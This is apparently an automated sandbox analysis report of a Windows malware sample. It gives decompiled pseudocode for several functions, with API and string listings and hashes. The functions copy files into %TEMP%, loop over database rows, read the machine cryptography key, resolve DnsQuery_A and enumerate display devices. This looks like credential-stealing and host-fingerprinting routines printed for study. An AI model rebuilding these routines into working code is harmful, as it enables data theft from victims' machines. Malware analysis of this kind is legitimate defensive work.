                                                                                                                                                                                              0x00410bcb
                                                                                                                                                                                              0x00410bce
                                                                                                                                                                                              0x00410bd4
                                                                                                                                                                                              0x00410bdb
                                                                                                                                                                                              0x00410bdc
                                                                                                                                                                                              0x00410be1
                                                                                                                                                                                              0x00410be4
                                                                                                                                                                                              0x00410bea
                                                                                                                                                                                              0x00410bf1
                                                                                                                                                                                              0x00410bf2
                                                                                                                                                                                              0x00410bf7
                                                                                                                                                                                              0x00410bfa
                                                                                                                                                                                              0x00410c05
                                                                                                                                                                                              0x00410c0a
                                                                                                                                                                                              0x00410c10
                                                                                                                                                                                              0x00410c15
                                                                                                                                                                                              0x00410c18
                                                                                                                                                                                              0x00410c25
                                                                                                                                                                                              0x00410c30
                                                                                                                                                                                              0x00410c3d
                                                                                                                                                                                              0x00410c42
                                                                                                                                                                                              0x00410c45
                                                                                                                                                                                              0x00410c4a
                                                                                                                                                                                              0x00410c55
                                                                                                                                                                                              0x00410c60
                                                                                                                                                                                              0x00410c6a
                                                                                                                                                                                              0x00410c79
                                                                                                                                                                                              0x00410c84
                                                                                                                                                                                              0x00410c8f
                                                                                                                                                                                              0x00410c9a
                                                                                                                                                                                              0x00410ca9
                                                                                                                                                                                              0x00410cc5
                                                                                                                                                                                              0x00410ccc
                                                                                                                                                                                              0x00410cce
                                                                                                                                                                                              0x00410cd1
                                                                                                                                                                                              0x00410cd3
                                                                                                                                                                                              0x00410ceb
                                                                                                                                                                                              0x00410cfd
                                                                                                                                                                                              0x00410d04
                                                                                                                                                                                              0x00410d06
                                                                                                                                                                                              0x00410d09
                                                                                                                                                                                              0x00410d0b
                                                                                                                                                                                              0x00410d67
                                                                                                                                                                                              0x00410d6b
                                                                                                                                                                                              0x00410d72
                                                                                                                                                                                              0x00410d75
                                                                                                                                                                                              0x00410d78
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00410d18
                                                                                                                                                                                              0x00410d29
                                                                                                                                                                                              0x00410d3c
                                                                                                                                                                                              0x00410d43
                                                                                                                                                                                              0x00410d45
                                                                                                                                                                                              0x00410d4d
                                                                                                                                                                                              0x00410d52
                                                                                                                                                                                              0x00410d55
                                                                                                                                                                                              0x00410d62
                                                                                                                                                                                              0x00410d62
                                                                                                                                                                                              0x00410d67
                                                                                                                                                                                              0x00410d0b
                                                                                                                                                                                              0x00410d7a
                                                                                                                                                                                              0x00410d7e
                                                                                                                                                                                              0x00410d85
                                                                                                                                                                                              0x00410d8c
                                                                                                                                                                                              0x00410d93
                                                                                                                                                                                              0x00410d98
                                                                                                                                                                                              0x00410d9b
                                                                                                                                                                                              0x00410db0
                                                                                                                                                                                              0x00410dbe
                                                                                                                                                                                              0x00410cab
                                                                                                                                                                                              0x00410cad
                                                                                                                                                                                              0x00410cb0
                                                                                                                                                                                              0x00410cb0
                                                                                                                                                                                              0x00410dc5
                                                                                                                                                                                              0x00410dc8
                                                                                                                                                                                              0x00410dcb
                                                                                                                                                                                              0x00410dd8
                                                                                                                                                                                              0x00410de0
                                                                                                                                                                                              0x00410de8
                                                                                                                                                                                              0x00410df0
                                                                                                                                                                                              0x00410dfd
                                                                                                                                                                                              0x00410e05
                                                                                                                                                                                              0x00410e12
                                                                                                                                                                                              0x00410e1f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410BFD
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CopyCountFileTick
                                                                                                                                                                                              • String ID: %TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 3448371392-3650661790
                                                                                                                                                                                              • Opcode ID: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
                                                                                                                                                                                              • Instruction ID: ad1686550c7843c0884c0506788be05dc1fde737249d1bd281ecbc27d8194f8d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
                                                                                                                                                                                              • Instruction Fuzzy Hash: BF412330914109AEDB01FF91D952ADDBBBDEF49318F50447BF400B7292D77CAE458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00410BB4, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                                                              			E00410BB4(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				signed int _t57;
				WCHAR* _t77;
				intOrPtr* _t92;
				void* _t94;
				intOrPtr* _t96;
				intOrPtr* _t100;
				intOrPtr* _t133;
				void* _t135;
				intOrPtr* _t137;
				void* _t139;
				intOrPtr* _t141;
				intOrPtr* _t147;
				void* _t149;
				void* _t155;
				intOrPtr _t175;
				intOrPtr _t177;
				intOrPtr _t185;
				intOrPtr _t189;
				intOrPtr _t190;
				void* _t191;
				void* _t192;

				_t187 = __esi;
				_t154 = __ebx;
				_t57 = __eax | 0x5500000a;
				_t189 = _t190;
				_t155 = 9;
				do {
					_push(0);
					_push(0);
					_t155 = _t155 - 1;
					_t195 = _t155;
				} while (_t155 != 0);
				_push(_t155);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t57;
				E004040F4( &_v8);
				_push(_t189);
				_push(0x410e20);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				E00403B80( &_v28);
				_push(_t189);
				_push(0x410da0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t195);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t195);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t154,  &_v40, _t195);
				E004062D8(L"%TEMP%",  &_v60, _t195);
				_push(_v60);
				_push(E00410E58);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t154,  &_v44, _t195);
				_t77 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t77, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t154, _t155,  &_v36, _t187, _t195);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t154, _t155) != 0) {
					_t92 =  *0x41b55c; // 0x41c784
					_t94 =  *((intOrPtr*)( *_t92))(E00403990(_v36),  &_v16);
					_t191 = _t190 + 8;
					__eflags = _t94;
					if(_t94 == 0) {
						E00408120(0x65,  &_v72);
						_t133 =  *0x41b5cc; // 0x41c78c
						_t135 =  *((intOrPtr*)( *_t133))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t192 = _t191 + 0x14;
						__eflags = _t135;
						if(_t135 == 0) {
							while(1) {
								_t137 =  *0x41b600; // 0x41c790
								_t139 =  *((intOrPtr*)( *_t137))(_v20);
								__eflags = _t139 - 0x64;
								if(_t139 != 0x64) {
									goto L10;
								}
								_t141 =  *0x41b588; // 0x41c794
								E00403C98( &_v76,  *((intOrPtr*)( *_t141))(_v20, 0, _v28));
								_t147 =  *0x41b588; // 0x41c794
								_t149 =  *((intOrPtr*)( *_t147))(_v20, 1, E00410E60, _v76);
								_t192 = _t192 + 0x10;
								E00403C98( &_v80, _t149);
								_push(_v80);
								_push(E00410E68);
								E00403E1C();
							}
						}
					}
					L10:
					_t96 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t96))(_v20);
					_t100 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t100))(_v16);
					_pop(_t175);
					 *[fs:eax] = _t175;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t185);
					 *[fs:eax] = _t185;
				}
				_pop(_t177);
				 *[fs:eax] = _t177;
				_push(E00410E27);
				E00403B98( &_v80, 2);
				E004034E4( &_v72);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}











































                                                                                                                                                                                              0x00410bb4
                                                                                                                                                                                              0x00410bb4
                                                                                                                                                                                              0x00410bb4
                                                                                                                                                                                              0x00410bb9
                                                                                                                                                                                              0x00410bbb
                                                                                                                                                                                              0x00410bc0
                                                                                                                                                                                              0x00410bc0
                                                                                                                                                                                              0x00410bc2
                                                                                                                                                                                              0x00410bc4
                                                                                                                                                                                              0x00410bc4
                                                                                                                                                                                              0x00410bc4
                                                                                                                                                                                              0x00410bc7
                                                                                                                                                                                              0x00410bc8
                                                                                                                                                                                              0x00410bc9
                                                                                                                                                                                              0x00410bca
                                                                                                                                                                                              0x00410bcb
                                                                                                                                                                                              0x00410bce
                                                                                                                                                                                              0x00410bd4
                                                                                                                                                                                              0x00410bdb
                                                                                                                                                                                              0x00410bdc
                                                                                                                                                                                              0x00410be1
                                                                                                                                                                                              0x00410be4
                                                                                                                                                                                              0x00410bea
                                                                                                                                                                                              0x00410bf1
                                                                                                                                                                                              0x00410bf2
                                                                                                                                                                                              0x00410bf7
                                                                                                                                                                                              0x00410bfa
                                                                                                                                                                                              0x00410c05
                                                                                                                                                                                              0x00410c0a
                                                                                                                                                                                              0x00410c10
                                                                                                                                                                                              0x00410c15
                                                                                                                                                                                              0x00410c18
                                                                                                                                                                                              0x00410c25
                                                                                                                                                                                              0x00410c30
                                                                                                                                                                                              0x00410c3d
                                                                                                                                                                                              0x00410c42
                                                                                                                                                                                              0x00410c45
                                                                                                                                                                                              0x00410c4a
                                                                                                                                                                                              0x00410c55
                                                                                                                                                                                              0x00410c60
                                                                                                                                                                                              0x00410c6a
                                                                                                                                                                                              0x00410c79
                                                                                                                                                                                              0x00410c84
                                                                                                                                                                                              0x00410c8f
                                                                                                                                                                                              0x00410c9a
                                                                                                                                                                                              0x00410ca9
                                                                                                                                                                                              0x00410cc5
                                                                                                                                                                                              0x00410ccc
                                                                                                                                                                                              0x00410cce
                                                                                                                                                                                              0x00410cd1
                                                                                                                                                                                              0x00410cd3
                                                                                                                                                                                              0x00410ceb
                                                                                                                                                                                              0x00410cfd
                                                                                                                                                                                              0x00410d04
                                                                                                                                                                                              0x00410d06
                                                                                                                                                                                              0x00410d09
                                                                                                                                                                                              0x00410d0b
                                                                                                                                                                                              0x00410d67
                                                                                                                                                                                              0x00410d6b
                                                                                                                                                                                              0x00410d72
                                                                                                                                                                                              0x00410d75
                                                                                                                                                                                              0x00410d78
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00410d18
                                                                                                                                                                                              0x00410d29
                                                                                                                                                                                              0x00410d3c
                                                                                                                                                                                              0x00410d43
                                                                                                                                                                                              0x00410d45
                                                                                                                                                                                              0x00410d4d
                                                                                                                                                                                              0x00410d52
                                                                                                                                                                                              0x00410d55
                                                                                                                                                                                              0x00410d62
                                                                                                                                                                                              0x00410d62
                                                                                                                                                                                              0x00410d67
                                                                                                                                                                                              0x00410d0b
                                                                                                                                                                                              0x00410d7a
                                                                                                                                                                                              0x00410d7e
                                                                                                                                                                                              0x00410d85
                                                                                                                                                                                              0x00410d8c
                                                                                                                                                                                              0x00410d93
                                                                                                                                                                                              0x00410d98
                                                                                                                                                                                              0x00410d9b
                                                                                                                                                                                              0x00410db0
                                                                                                                                                                                              0x00410dbe
                                                                                                                                                                                              0x00410cab
                                                                                                                                                                                              0x00410cad
                                                                                                                                                                                              0x00410cb0
                                                                                                                                                                                              0x00410cb0
                                                                                                                                                                                              0x00410dc5
                                                                                                                                                                                              0x00410dc8
                                                                                                                                                                                              0x00410dcb
                                                                                                                                                                                              0x00410dd8
                                                                                                                                                                                              0x00410de0
                                                                                                                                                                                              0x00410de8
                                                                                                                                                                                              0x00410df0
                                                                                                                                                                                              0x00410dfd
                                                                                                                                                                                              0x00410e05
                                                                                                                                                                                              0x00410e12
                                                                                                                                                                                              0x00410e1f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410BFD
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CopyCountFileTick
                                                                                                                                                                                              • String ID: %TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 3448371392-3650661790
                                                                                                                                                                                              • Opcode ID: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
                                                                                                                                                                                              • Instruction ID: ab4a798e1dfa23648b03a2b2561a2af29de01fabf162149de749457abe37d48b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 37411331910109AEDB01FF92D952ADDBBBDEF48318F50447BF400B3292D77DAE458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040DDB0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                                                              			E0040DDB0(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t29;
				void* _t40;
				WCHAR* _t51;
				int _t54;
				void* _t59;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t73;
				void* _t74;
				intOrPtr _t77;
				void* _t78;
				void* _t79;

				_t74 = __esi;
				_t73 = __edi;
				_t63 = __edx;
				_t59 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E00403980(_v12);
				_push(_t77);
				_push(0x40deaf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t77;
				_t29 = E00403790(_v16);
				asm("cdq");
				_t78 = _t63 -  *0x41c82c; // 0x0
				if(_t78 != 0) {
					if(__eflags < 0) {
						goto L4;
					}
				} else {
					_t79 = _t29 -  *0x41c828; // 0x0
					if(_t79 < 0) {
						L4:
						E00407168(_v8, _t59,  &_v16);
						_t40 = E00403790(_v16);
						_t80 = _t40;
						if(_t40 == 0) {
							_t9 =  &_v20; // 0x414c4c
							E004062D8(L"%TEMP%\\curbuf.dat", _t9, _t80);
							_t10 =  &_v20; // 0x414c4c
							_t51 = E00403D3C( *_t10);
							_t54 = CopyFileW(E00403D3C(_v8), _t51, 0);
							_t81 = _t54;
							if(_t54 != 0) {
								E004062D8(L"%TEMP%\\curbuf.dat",  &_v24, _t81);
								E00407168(_v24, _t59,  &_v16);
							}
						}
						E0040DCE8(_v16, _t59, _v12, _t73, _t74);
						E004062D8(L"%TEMP%\\curbuf.dat",  &_v28, _t81);
						DeleteFileW(E00403D3C(_v28));
					}
				}
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(E0040DEB6);
				E00403B98( &_v28, 3);
				E00403508( &_v16, 2);
				return E00403B80( &_v8);
			}





















                                                                                                                                                                                              0x0040ddb0
                                                                                                                                                                                              0x0040ddb0
                                                                                                                                                                                              0x0040ddb0
                                                                                                                                                                                              0x0040ddb0
                                                                                                                                                                                              0x0040ddb5
                                                                                                                                                                                              0x0040ddb6
                                                                                                                                                                                              0x0040ddb7
                                                                                                                                                                                              0x0040ddb8
                                                                                                                                                                                              0x0040ddb9
                                                                                                                                                                                              0x0040ddba
                                                                                                                                                                                              0x0040ddbb
                                                                                                                                                                                              0x0040ddbe
                                                                                                                                                                                              0x0040ddc4
                                                                                                                                                                                              0x0040ddcc
                                                                                                                                                                                              0x0040ddd3
                                                                                                                                                                                              0x0040ddd4
                                                                                                                                                                                              0x0040ddd9
                                                                                                                                                                                              0x0040dddc
                                                                                                                                                                                              0x0040dde2
                                                                                                                                                                                              0x0040dde7
                                                                                                                                                                                              0x0040dde8
                                                                                                                                                                                              0x0040ddee
                                                                                                                                                                                              0x0040ddfe
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040ddf0
                                                                                                                                                                                              0x0040ddf0
                                                                                                                                                                                              0x0040ddf6
                                                                                                                                                                                              0x0040de00
                                                                                                                                                                                              0x0040de06
                                                                                                                                                                                              0x0040de0e
                                                                                                                                                                                              0x0040de13
                                                                                                                                                                                              0x0040de15
                                                                                                                                                                                              0x0040de19
                                                                                                                                                                                              0x0040de21
                                                                                                                                                                                              0x0040de26
                                                                                                                                                                                              0x0040de29
                                                                                                                                                                                              0x0040de38
                                                                                                                                                                                              0x0040de3d
                                                                                                                                                                                              0x0040de3f
                                                                                                                                                                                              0x0040de49
                                                                                                                                                                                              0x0040de54
                                                                                                                                                                                              0x0040de54
                                                                                                                                                                                              0x0040de3f
                                                                                                                                                                                              0x0040de5f
                                                                                                                                                                                              0x0040de6c
                                                                                                                                                                                              0x0040de7a
                                                                                                                                                                                              0x0040de7a
                                                                                                                                                                                              0x0040ddf6
                                                                                                                                                                                              0x0040de81
                                                                                                                                                                                              0x0040de84
                                                                                                                                                                                              0x0040de87
                                                                                                                                                                                              0x0040de94
                                                                                                                                                                                              0x0040dea1
                                                                                                                                                                                              0x0040deae

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C), ref: 0040DE38
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C,00000001,?), ref: 0040DE7A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$AllocCopyDeleteString
                                                                                                                                                                                              • String ID: %TEMP%\curbuf.dat$LLA
                                                                                                                                                                                              • API String ID: 5292005-3909751444
                                                                                                                                                                                              • Opcode ID: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
                                                                                                                                                                                              • Instruction ID: d3139e3bb668dcd489f787ebceafddff3eb8ed9e6fe86914fc70b8a9fa006da4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E21FC74D10509ABDB00FBE5C88299EB7B9AF54305F50857BF400B72D2D738AE058A99
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00417E78, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 36%
                                                                                                                                                                                              			E00417E78(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v117;
				void* _t16;
				intOrPtr* _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t49;

				_t16 = __eax +  *__eax;
				 *_t16 =  *_t16 + _t16;
				 *[cs:eax] =  *[cs:eax] + _t16;
				_v117 = _v117 + __edx;
				_v12 = __edx;
				_v8 = _t16;
				E00403980(_v8);
				_push(_t49);
				_push(0x417f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49 + 0xfffffff4;
				_t46 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
				if(_t46 != 0) {
					_v16 = 0;
					_t37 = E00402530(0x30);
					_v16 = E00402530(0x48);
					 *_t37 = 1;
					 *((intOrPtr*)(_t37 + 4)) = _v12;
					_push(0);
					_push( &_v16);
					_push(_t37);
					_push(0);
					_push(1);
					_push(E00403990(_v8));
					if( *_t46() == 0) {
					}
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E00417F29);
				return E004034E4( &_v8);
			}












                                                                                                                                                                                              0x00417e78
                                                                                                                                                                                              0x00417e7a
                                                                                                                                                                                              0x00417e7c
                                                                                                                                                                                              0x00417e7f
                                                                                                                                                                                              0x00417e89
                                                                                                                                                                                              0x00417e8c
                                                                                                                                                                                              0x00417e92
                                                                                                                                                                                              0x00417e99
                                                                                                                                                                                              0x00417e9a
                                                                                                                                                                                              0x00417e9f
                                                                                                                                                                                              0x00417ea2
                                                                                                                                                                                              0x00417ebc
                                                                                                                                                                                              0x00417ec0
                                                                                                                                                                                              0x00417ec4
                                                                                                                                                                                              0x00417ed1
                                                                                                                                                                                              0x00417edd
                                                                                                                                                                                              0x00417ee0
                                                                                                                                                                                              0x00417ee9
                                                                                                                                                                                              0x00417eec
                                                                                                                                                                                              0x00417ef1
                                                                                                                                                                                              0x00417ef2
                                                                                                                                                                                              0x00417ef3
                                                                                                                                                                                              0x00417ef5
                                                                                                                                                                                              0x00417eff
                                                                                                                                                                                              0x00417f04
                                                                                                                                                                                              0x00417f04
                                                                                                                                                                                              0x00417f04
                                                                                                                                                                                              0x00417f0e
                                                                                                                                                                                              0x00417f11
                                                                                                                                                                                              0x00417f14
                                                                                                                                                                                              0x00417f21

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                                                                              • API String ID: 2574300362-3847274415
                                                                                                                                                                                              • Opcode ID: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
                                                                                                                                                                                              • Instruction ID: ee02e28701cd333fe80aa916ff0e932040e536dc5bff3800914b034e455f76c5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
                                                                                                                                                                                              • Instruction Fuzzy Hash: A9115E71A08304AED711DBA9CC52B9EBBB8DB45704F5140A7E504E72D2D6789E018B58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00417E7C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 33%
                                                                                                                                                                                              			E00417E7C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v117;
				intOrPtr* _t36;
				intOrPtr _t40;
				intOrPtr* _t45;
				void* _t48;

				 *[cs:eax] =  *[cs:eax] + __eax;
				_v117 = _v117 + __edx;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				_push(_t48);
				_push(0x417f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t48 + 0xfffffff4;
				_t45 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
				if(_t45 != 0) {
					_v16 = 0;
					_t36 = E00402530(0x30);
					_v16 = E00402530(0x48);
					 *_t36 = 1;
					 *((intOrPtr*)(_t36 + 4)) = _v12;
					_push(0);
					_push( &_v16);
					_push(_t36);
					_push(0);
					_push(1);
					_push(E00403990(_v8));
					if( *_t45() == 0) {
					}
				}
				_pop(_t40);
				 *[fs:eax] = _t40;
				_push(E00417F29);
				return E004034E4( &_v8);
			}











                                                                                                                                                                                              0x00417e7c
                                                                                                                                                                                              0x00417e7f
                                                                                                                                                                                              0x00417e89
                                                                                                                                                                                              0x00417e8c
                                                                                                                                                                                              0x00417e92
                                                                                                                                                                                              0x00417e99
                                                                                                                                                                                              0x00417e9a
                                                                                                                                                                                              0x00417e9f
                                                                                                                                                                                              0x00417ea2
                                                                                                                                                                                              0x00417ebc
                                                                                                                                                                                              0x00417ec0
                                                                                                                                                                                              0x00417ec4
                                                                                                                                                                                              0x00417ed1
                                                                                                                                                                                              0x00417edd
                                                                                                                                                                                              0x00417ee0
                                                                                                                                                                                              0x00417ee9
                                                                                                                                                                                              0x00417eec
                                                                                                                                                                                              0x00417ef1
                                                                                                                                                                                              0x00417ef2
                                                                                                                                                                                              0x00417ef3
                                                                                                                                                                                              0x00417ef5
                                                                                                                                                                                              0x00417eff
                                                                                                                                                                                              0x00417f04
                                                                                                                                                                                              0x00417f04
                                                                                                                                                                                              0x00417f04
                                                                                                                                                                                              0x00417f0e
                                                                                                                                                                                              0x00417f11
                                                                                                                                                                                              0x00417f14
                                                                                                                                                                                              0x00417f21

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                                                                              • API String ID: 2574300362-3847274415
                                                                                                                                                                                              • Opcode ID: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
                                                                                                                                                                                              • Instruction ID: 3ed38bd560de987a20526e09c97c4f2d359d7c1ce2b9a36b0a47fbdadc566110
                                                                                                                                                                                              • Opcode Fuzzy Hash: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
                                                                                                                                                                                              • Instruction Fuzzy Hash: 48113D71A08304AEDB11DBA9CD52B9EBBB8DB44714F5140BBF904E73D1D6789E018B58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00416644, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 32%
                                                                                                                                                                                              			E00416644(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				_Unknown_base(*)()* _v8;
				char _v268;
				char _v336;
				char _v340;
				char _v344;
				void* _t31;
				intOrPtr _t39;
				intOrPtr* _t43;
				void* _t46;

				_v340 = 0;
				_v344 = 0;
				_t43 = __eax;
				_push(_t46);
				_push(0x41670d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffeac;
				_v8 = GetProcAddress(LoadLibraryA("user32.dll"), "EnumDisplayDevicesW");
				_v336 = 0x148;
				_t31 = 0;
				while(1) {
					_push(0);
					_push( &_v336);
					_push(_t31);
					_push(0);
					if(_v8() == 0) {
						break;
					}
					_t31 = _t31 + 1;
					_push( *_t43);
					E00403D10( &_v344, 0x80,  &_v268);
					E0040377C( &_v340, _v344);
					_push(_v340);
					_push(E00416744);
					E00403850();
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E00416714);
				E00403B80( &_v344);
				return E004034E4( &_v340);
			}












                                                                                                                                                                                              0x00416652
                                                                                                                                                                                              0x00416658
                                                                                                                                                                                              0x0041665e
                                                                                                                                                                                              0x00416662
                                                                                                                                                                                              0x00416663
                                                                                                                                                                                              0x00416668
                                                                                                                                                                                              0x0041666b
                                                                                                                                                                                              0x00416683
                                                                                                                                                                                              0x00416686
                                                                                                                                                                                              0x00416692
                                                                                                                                                                                              0x004166d7
                                                                                                                                                                                              0x004166d7
                                                                                                                                                                                              0x004166de
                                                                                                                                                                                              0x004166df
                                                                                                                                                                                              0x004166e0
                                                                                                                                                                                              0x004166e7
                                                                                                                                                                                              0x00000000
